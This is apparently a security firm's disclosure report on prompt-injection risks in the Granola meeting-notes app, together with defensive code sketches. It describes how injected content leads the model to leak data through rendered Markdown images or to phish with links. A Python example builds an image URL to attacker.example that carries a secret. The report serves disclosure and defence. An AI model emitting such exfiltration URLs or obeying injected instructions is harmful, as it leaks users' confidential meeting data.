Granola AI Security Risks and Remediations

A breakdown of the threat model for Granola, a vulnerability discovered during testing, data training risks, and other risk surfaces for the application.

Published: April 9, 2026

The Threat Model

For Granola, the primary AI-specific risk is indirect prompt injection. Granola can encounter indirect prompt injections through any untrusted data source, primarily meeting content or uploaded files that originate from an untrusted third party (such as files found online or provided by an external guest).

In Granola, prompt injections are likely to target two primary outcomes: data exfiltration and phishing.

For data exfiltration, injections can target potential weaknesses in the chat interface by attempting to make it render insecure Markdown images or HTML. If an injection manipulates Granola into embedding sensitive user data from the agent’s context in such an element (for example, in an image URL), and the element is rendered rather than sanitized, the sensitive data is exfiltrated when the client requests the element.
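To make the mechanism concrete, the following is a minimal sketch of why a rendered Markdown image leaks data: the image URL itself carries the payload, so the request to fetch the image delivers it. The host `attacker.example`, the query parameter `d`, and both function names are hypothetical and chosen only for illustration; this is not a payload observed against Granola.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical attacker-controlled endpoint (placeholder domain).
ATTACKER_PIXEL = "https://attacker.example/pixel.png"


def build_exfil_markdown(secret: str) -> str:
    """Markdown an injected prompt would try to make the model emit."""
    return f"![status]({ATTACKER_PIXEL}?d={quote(secret)})"


def what_the_server_sees(markdown: str) -> str:
    """Recover the leaked value from the URL a renderer would request."""
    url = markdown[markdown.index("(") + 1 : markdown.rindex(")")]
    return parse_qs(urlsplit(url).query)["d"][0]


payload = build_exfil_markdown("Q3 revenue: $4.2M")
print(payload)
print(what_the_server_sees(payload))
```

No click is needed in this scenario: if the client renders the image automatically, the request (and the data in its query string) is sent as soon as the message is displayed.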

For phishing, injections can manipulate the model into outputting hyperlinks to untrusted sites or, worse, clickable images that look like buttons, accompanied by instructions that socially engineer the victim into interacting with the malicious content.

Below, we examine the degree to which these risks apply to Granola and additionally identify a potential gap in Granola’s terms for training AI models on user data. We also note how integrations relate to Granola’s risk surface.

Security Vulnerabilities Disclosed in Granola Mobile

The PromptArmor team identified that some protections present in the desktop app were not present in the mobile app. The desktop app sanitized model outputs to prevent insecure Markdown image rendering – the mobile app did not.

At the time of assessment, the exploitability of insecure Markdown image rendering in the mobile app via indirect prompt injection was low, because the data processed by the vulnerable interface comes primarily from highly trusted sources.

However, as the Granola mobile app is expected to soon feature more data sources similar to the desktop app, such as document uploads, we reported the vulnerabilities to allow Granola’s team to fix them before the attack surface expands.

Granola’s security team promptly validated the vulnerabilities described in the mobile app, and stated a mitigation would be deployed during the week of Monday, March 23rd, 2026:

"...to ensure this doesn't become an issue in future as we add more capabilities (e.g., file attachments), we're updating our iOS app to not automatically render images (aligning it with our desktop app behavior). This mitigates both the information leakage and phishing vectors..."

Desktop App Security Features

Granola’s desktop app has protections in place that address the three insecure output mechanisms most likely to be targeted via indirect prompt injection in the context of Granola’s use case. We commend the team for this.



Data exfiltration via dynamically generated Markdown image rendering

It was observed that Markdown images, both inline and reference format, are stripped from LLM output and replaced with a hyperlinked URL and an emoji of an image.
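As a rough illustration of this kind of defense, the sketch below rewrites inline and reference-style Markdown images into an image emoji followed by a plain hyperlink. It is not Granola's implementation, which was not inspected; the function names and regular expressions are assumptions, and a production sanitizer would more likely operate on a parsed Markdown tree than on regular expressions.

```python
import re

IMAGE_EMOJI = "\U0001F5BC"  # framed-picture emoji used as the visual placeholder

# Inline form: ![alt](url) or ![alt](url "title")
INLINE_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
# Reference form: ![alt][label], or ![alt][] where the alt text doubles as the label
REFERENCE_IMAGE = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')
# Reference definition: [label]: url
REFERENCE_DEF = re.compile(
    r'^[ ]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$', re.MULTILINE
)


def as_link(url: str) -> str:
    """Emoji plus a hyperlink whose visible text is the full URL."""
    return f"{IMAGE_EMOJI} [{url}]({url})"


def neutralize_images(markdown: str) -> str:
    """Replace Markdown images so that nothing is fetched automatically."""
    definitions = {label.lower(): url for label, url in REFERENCE_DEF.findall(markdown)}

    def replace_reference(match: re.Match) -> str:
        label = (match.group(2) or match.group(1)).lower()
        url = definitions.get(label)
        # Unknown label: keep only the emoji and alt text, never an image.
        return as_link(url) if url else f"{IMAGE_EMOJI} {match.group(1)}"

    without_inline = INLINE_IMAGE.sub(lambda m: as_link(m.group(1)), markdown)
    return REFERENCE_IMAGE.sub(replace_reference, without_inline)


print(neutralize_images("![a](https://x.example/p.png?d=1)"))
```

This sketch does not cover every Markdown form (for example, shortcut references such as `![alt]` or alt text containing brackets), which is one reason a parser-based approach is preferable in practice.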



Phishing via malicious hyperlink outputs

It was observed that Granola displays a warning interstitial that indicates to users when they are navigating to an external site, displaying the full URL being navigated to (not just the anchor text) for review.
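A minimal sketch of the decision behind such an interstitial might look like the following. The allowlisted host `notes.example`, the function names, and the warning wording are all hypothetical; the point is only that the check is made against the parsed hostname and that the full destination is shown alongside the anchor text.

```python
from urllib.parse import urlsplit

# Hypothetical first-party hosts that do not need a warning.
TRUSTED_HOSTS = {"notes.example"}


def needs_interstitial(href: str) -> bool:
    """Return True when a link should be confirmed by the user before opening."""
    parts = urlsplit(href)
    if parts.scheme not in ("http", "https"):
        return True  # unusual or missing schemes are treated as needing review
    host = (parts.hostname or "").lower()
    is_trusted = host in TRUSTED_HOSTS or any(
        host.endswith("." + trusted) for trusted in TRUSTED_HOSTS
    )
    return not is_trusted


def interstitial_text(anchor_text: str, href: str) -> str:
    """Show the real destination, not just the (attacker-chosen) anchor text."""
    return f"You are leaving the app.\nLink text: {anchor_text}\nDestination: {href}"


link = "https://notes.example.evil.test/login"
if needs_interstitial(link):
    print(interstitial_text("Sign in to continue", link))
```

Comparing the parsed hostname, rather than searching the URL string for a trusted name, avoids being fooled by lookalike hosts such as the one in the usage example.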



Screen overlay attacks or data exfiltration via dynamic HTML injection

It was observed that HTML elements are either stripped from output or displayed as non-interactive text when found in model outputs.
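The "displayed as non-interactive text" behavior can be approximated by escaping model output before it reaches an HTML view. The sketch below uses Python's standard `html.escape`; the function name is an assumption, and this is an illustration of the general technique rather than a description of how Granola implements it.

```python
import html


def render_as_inert_text(model_output: str) -> str:
    """Escape HTML metacharacters so tags display as literal text."""
    return html.escape(model_output, quote=True)


print(render_as_inert_text('<img src=x onerror="alert(1)">'))
```

After escaping, the browser shows the tag as characters on screen instead of interpreting it, so no element is created and no request or script is triggered.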

These three defenses mitigate well-known data exfiltration and phishing vectors often found in LLM-based applications.

Data Training Terms Gap

Granola's data protections may not cover inputs that unauthenticated visitors submit to chats with shared notes.

Granola’s Platform Terms scope their data protections to "Customer Data," defined as data from a "Customer or its Authorized User" with a unique account. Unauthenticated visitors, including those without a Granola account or who are not logged in, do not meet this definition.

Granola's Privacy Policy limits training to de-identified data, but the opt-out from that use requires an account. This matters because queries to a meeting notes chat reveal substantive meeting content through the questions themselves. For enterprises whose users share notes externally, or whose internal users open shared notes in an unauthenticated browser, these inputs may flow into Granola's training pipeline in derivative form, outside the protections negotiated in your agreement.

Starting Mitigations

1. Obtain a contractual agreement explicitly prohibiting the use of any inputs, outputs, or data derived from chats with shared notes (e.g., anonymized, de-identified, or aggregated data) by Granola to improve multi-tenant models.



2. Restrict default sharing. Instruct users to change the default link sharing setting (this is a user-level preference):

Settings → Preferences → Data & sharing → Default link sharing → "Only my company" or "Private"

Note: sharing visibility can also be configured per link when sharing an individual note.

Additionally, if your organization is on the Business or Basic plan, users should configure the following:

3. Opt out of model improvement (user-level setting):

Settings → Preferences → Data & sharing → Use my data to improve models for everyone → Off

Integration Risk Surface

Granola supports various integrations intended to allow access to Granola data from other ecosystems. This includes MCP connectors and direct integrations to apps such as Zapier, Slack, Notion, HubSpot, Attio, and Affinity. Granola also supports custom API integrations for enterprises. These tools allow users to (1) access Granola data from outside of Granola via MCP and (2) sync Granola data to external systems of record.

Because these integrations do not pull data into the model’s context window, they do not present an additional risk of ingesting untrusted data that may contain prompt injections. Furthermore, risks of system manipulation (the agent taking malicious actions using tools) are limited because the agent cannot directly invoke these integrated tools.

It is important to ensure that all downstream systems processing these LLM outputs (1) do not render the outputs as Markdown or HTML, (2) do not initiate irreversible automated actions based on the synced data, and (3) clearly indicate to future viewers of the data that the content was populated from potentially untrustworthy LLM outputs.
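One way a downstream consumer could apply these three checks is sketched below. The `SyncedNote` record, its field names, and `prepare_for_sync` are hypothetical and do not correspond to any Granola or integration API; the sketch assumes the receiving system stores the note as plain text and might later display it in an HTML view.

```python
import html
from dataclasses import dataclass


@dataclass(frozen=True)
class SyncedNote:
    body_text: str              # escaped text, intended to be shown literally
    render_mode: str            # tells viewers not to interpret Markdown or HTML
    provenance: str             # label shown to future readers of the record
    requires_human_review: bool # gate for any irreversible automation


def prepare_for_sync(llm_output: str) -> SyncedNote:
    """Wrap LLM-generated content before writing it to a system of record."""
    return SyncedNote(
        body_text=html.escape(llm_output),
        render_mode="plain_text",
        provenance="AI-generated from meeting content; may contain untrusted text",
        requires_human_review=True,
    )


note = prepare_for_sync("<b>Approve refund</b> ![x](https://a.test/?d=1)")
print(note.body_text)
print(note.provenance)
```

Keeping the review flag on the record itself lets automation in the downstream system refuse to act on the content until a person has confirmed it.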
